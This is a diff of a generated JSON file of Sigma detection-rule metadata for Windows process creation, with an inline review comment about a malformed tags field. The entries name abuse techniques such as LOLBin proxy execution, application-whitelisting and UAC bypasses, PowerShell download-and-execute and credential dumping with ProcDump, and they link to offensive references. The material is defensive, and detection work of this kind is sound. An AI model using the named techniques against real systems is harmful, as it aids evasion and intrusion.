+ "author": "Florian Roth, Samir Bousseaden", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_compression_params.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1184067445612535811", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "value": "Suspicious Compression Tool Parameters" + }, + { + "description": "Detects usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_manage_bde_lolbas.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", + "https://twitter.com/JohnLaTwC/status/1223292479270600706", + "https://twitter.com/bohops/status/980659399495741441", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", + "value": "Suspicious Usage of the Manage-bde.wsf Script" + }, + { + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "value": "Use of VSIISExeLauncher.exe" + }, + { + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "meta": { + "author": "Agro (@agro_sev) oscd.community", + "creation_date": "2020/10/10", + "falsepositive": [ + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + ], + "filename": "proc_creation_win_susp_use_of_sqlps_bin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", + "https://twitter.com/bryon_/status/975835709587075072", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "value": "Detection of PowerShell Execution via Sqlps.exe" + }, + { + "description": "Detection of unusual child processes by different system processes", + "meta": { + "author": "Semanur Guneysu @semanurtg, oscd.community", + "creation_date": "2020/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_abusing_debug_privilege.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + 
"refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", + "value": "Abused Debug Privilege by Arbitrary Parent Processes" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "value": "Invoke-Obfuscation Via Use Clip" }, { "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", 
@@ -40931,103 +33468,310 @@
 "value": "REGISTER_APP.VBS Proxy Execution"
 },
 {
- "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.",
+ "description": "Detects a service binary running in a suspicious directory",
 "meta": {
- "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io",
- "creation_date": "2022/06/02",
- "falsepositive": [
- "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)."
- ],
- "filename": "proc_creation_win_lolbin_remote.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1127"
- ]
- },
- "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93",
- "value": "Use of Remote.exe"
- },
- {
- "description": "Detects the use of Replace.exe which can be used to replace file with another file",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/03/06",
+ "author": "Florian Roth",
+ "creation_date": "2021/03/09",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "proc_creation_win_lolbin_replace.yml",
- "level": "medium",
+ "filename": "proc_creation_win_susp_service_dir.yml",
+ "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Replace/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1105"
- ]
- },
- "uuid": "9292293b-8496-4715-9db6-37028dcda4b3",
- "value": "Replace.exe Usage"
- },
- {
- "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver",
- "meta": {
- "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec",
- "creation_date": "2022/04/28",
- "falsepositive": [
- "Legitimate installation of a new screensaver"
- ],
- "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/Libraries/Desk/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml"
- ],
- "tags": [
- "attack.t1218.011",
- "attack.defense_evasion"
- ]
- },
- "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221",
- "value": "Rundll32 InstallScreenSaver Execution"
- },
- {
- "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/01",
- "falsepositive": [
- "Legitimate use when App-v is deployed"
- ],
- "filename": "proc_creation_win_lolbin_scriptrunner.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml"
+ "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml"
 ],
 "tags": [
 "attack.defense_evasion",
+ "attack.t1202"
+ ]
+ },
+ "uuid": "883faa95-175a-4e22-8181-e5761aeb373c",
+ "value": "Suspicious Service Binary Directory"
+ },
+ {
+ "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading",
+ "meta": {
+ "author": "elhoim",
+ "creation_date": "2022/09/09",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_renamed_vmnat.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/malmoeb/status/1525901219247845376",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1574.002"
+ ]
+ },
+ "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205",
+ "value": "Renamed or Portable Vmnat.exe"
+ },
+ {
+ "description": "Detects the use of tools created by a well-known hacktool producer named Cube0x0, which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec etc.)",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/04/27",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_hack_cube0x0_tools.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files",
+ "https://github.com/cube0x0",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b",
+ "value": "Hacktool by Cube0x0"
+ },
+ {
+ "description": "Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2020/11/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_malware_trickbot_wermgr.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
+ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml"
+ ],
+ "tags": [
 "attack.execution",
+ "attack.t1559"
+ ]
+ },
+ "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27",
+ "value": "Trickbot Malware Activity"
+ },
+ {
+ "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'",
+ "meta": {
+ "author": "Konstantin Grishchenko, oscd.community",
+ "creation_date": "2020/10/17",
+ "falsepositive": [
+ "Legitimate usage by software developers"
+ ],
+ "filename": "proc_creation_win_susp_csi.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
+ "https://twitter.com/Z3Jpa29z/status/1317545798981324801",
+ "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1072",
+ "attack.defense_evasion",
 "attack.t1218"
 ]
 },
- "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420",
- "value": "Use of Scriptrunner.exe"
+ "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e",
+ "value": "Suspicious Csi.exe Usage"
+ },
+ {
+ "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2019/11/18",
+ "falsepositive": [
+ "Procdump illegaly bundled with legitimate software",
+ "Administrators who rename binaries (should be investigated)"
+ ],
+ "filename": "proc_creation_win_renamed_procdump.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ]
+ },
+ "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67",
+ "value": "Renamed ProcDump Execution"
+ },
+ {
+ "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.",
+ "meta": {
+ "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'",
+ "creation_date": "2022/01/25",
+ "falsepositive": [
+ "Rare false positives could occur on servers with multiple drives."
+ ],
+ "filename": "proc_creation_win_lolbin_not_from_c_drive.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.scythe.io/library/threat-emulation-qakbot",
+ "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml"
+ ],
+ "tags": [
+ "attack.t1218.001"
+ ]
+ },
+ "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87",
+ "value": "LOLBIN From Abnormal Drive"
+ },
+ {
+ "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.",
+ "meta": {
+ "author": "Nasreddine Bencherchali, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community",
+ "creation_date": "2022/06/14",
+ "falsepositive": [
+ "Legitimate use by a via a batch script or by an administrator."
+ ],
+ "filename": "proc_creation_win_lolbin_pcalua.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/",
+ "https://pentestlab.blog/2020/07/06/indirect-command-execution/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2",
+ "value": "Use of Pcalua For Execution"
+ },
+ {
+ "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity",
+ "meta": {
+ "author": "Florian Roth, Nasreddine Bencherchali",
+ "creation_date": "2022/01/24",
+ "falsepositive": [
+ "Legitimate use by administrators"
+ ],
+ "filename": "proc_creation_win_tool_nircmd.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
+ "https://www.nirsoft.net/utils/nircmd.html",
+ "https://www.nirsoft.net/utils/nircmd2.html#using",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1569.002",
+ "attack.s0029"
+ ]
+ },
+ "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22",
+ "value": "NirCmd Tool Execution"
+ },
+ {
+ "description": "Detects suspicious ways to download files or content and execute them using PowerShell",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/03/24",
+ "falsepositive": [
+ "Scripts or tools that download files and execute them"
+ ],
+ "filename": "proc_creation_win_susp_powershell_download_iex.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775",
+ "value": "PowerShell Web Download and Execution"
+ },
+ {
+ "description": "Use of hostname to get information",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/01",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_hostname.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1082"
+ ]
+ },
+ "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e",
+ "value": "Suspicious Execution of Hostname"
+ },
+ {
+ "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)",
+ "meta": {
+ "author": "Nik Seetharaman, Christian Burkard",
+ "creation_date": "2019/07/31",
+ "falsepositive": [
+ "Legitimate CMSTP use (unlikely in modern enterprise environments)"
+ ],
+ "filename": "proc_creation_win_cmstp_com_object_access.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
+ "https://github.com/hfiref0x/UACME",
+ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
+ "https://twitter.com/hFireF0X/status/897640081053364225",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1548.002",
+ "attack.t1218.003",
+ "attack.g0069",
+ "car.2019-04-001"
+ ]
+ },
+ "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253",
+ "value": "CMSTP UAC Bypass via COM Object Access"
 },
 {
 "description": "Detects using SettingSyncHost.exe to run hijacked binary",
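Review bot: The Cube0x0 entry (uuid 37c1333a-a0db-48be-b64b-7393b2386e3b) carries `"tags": "No established tags"`, a string where every other entry in this hunk has `meta.tags` as an array of ATT&CK/CAR identifiers; a consumer that iterates `tags` to build galaxy relationships will either fail on this element or iterate the string's characters. Keep the field's type stable by emitting `"tags": []` (or omitting the key) for rules with no tags, and since this file is generated from the Sigma rule set the fix belongs in the generator's fallback rather than a hand edit here. The same generator presumably produced the rest of the 63k-line cluster, so it is worth grepping the full output for other string-typed `tags` values. The description typos (`execition`, `illegaly`) mirror upstream Sigma rule text and are better corrected there than in this generated file.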
@@ -41055,761 +33799,432 @@ "value": "Using SettingSyncHost.exe as LOLBin" }, { - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/10", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_sftp.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/264", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", - "value": "Use Of The SFTP.EXE Binary As A LOLBIN" - }, - { - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1560732860935729152", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", - "value": "Sideloading Link.EXE" - }, - { - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": 
"proc_creation_win_lolbin_sigverif.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", - "https://twitter.com/0gtweet/status/1457676633809330184", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", - "value": "Suspicious Sigverif Execution" - }, - { - "description": "The \"Squirrel.exe\" binary that is part of multiple software (Slack, Teams, Discord...etc) can be used as a LOLBIN", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/09", - "falsepositive": [ - "See rule (fa4b21c9-0057-4493-b289-2556416ae4d7) for possible FPs" - ], - "filename": "proc_creation_win_lolbin_squirrel.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ] - }, - "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", - "value": "Use of Squirrel.exe" - }, - { - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", "meta": { "author": "Florian Roth", - "creation_date": "2022/01/06", - "falsepositive": [ - "Legitimate use of the UI Accessibility Checker" - ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": 
"windows", - "refs": [ - "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", - "https://twitter.com/bohops/status/1477717351017680899?s=12", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", - "value": "Suspicious LOLBIN AccCheckConsole" - }, - { - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "meta": { - "author": "Mateusz Wydra, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Legitimate, non-default assistive technology applications execution" - ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "value": "Suspicious Atbroker Execution" - }, - { - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", - "value": "Suspicious Certreq Command to Download" - }, - { - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "meta": { - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", - "creation_date": "2021/09/30", - "falsepositive": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", - "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ] - }, - "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", - "value": "Suspicious Driver Install by pnputil.exe" - }, - { - "description": "Detects execution of of Dxcap.exe", - "meta": { - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (update)", - "creation_date": "2019/10/26", - "falsepositive": [ - "Legitimate execution of dxcap.exe by legitimate user" - ], - "filename": "proc_creation_win_lolbin_susp_dxcap.yml", - "level": "medium", - "logsource.category": 
"process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", - "https://twitter.com/harr0ey/status/992008180904419328", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "60f16a96-db70-42eb-8f76-16763e333590", - "value": "Application Whitelisting Bypass via Dxcap.exe" - }, - { - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/19", + "creation_date": "2022/03/21", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml", + "filename": "proc_creation_win_susp_parents.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1526833181831200770", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" + "https://twitter.com/x86matthew/status/1505476263464607744?s=12", + "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" ], - "tags": [ - "attack.persistence", - "attack.t1547" - ] + "tags": "No established tags" }, - "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "value": "Suspicious GrpConv Execution" + "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "value": "Suspicious Process Parents" }, { - "description": "Detect the use of Windows Defender to download payloads", + "description": "Detect various execution methods of the CrackMapExec pentesting framework", "meta": { - "author": "Matthew Matchen", - "creation_date": "2020/09/04", + 
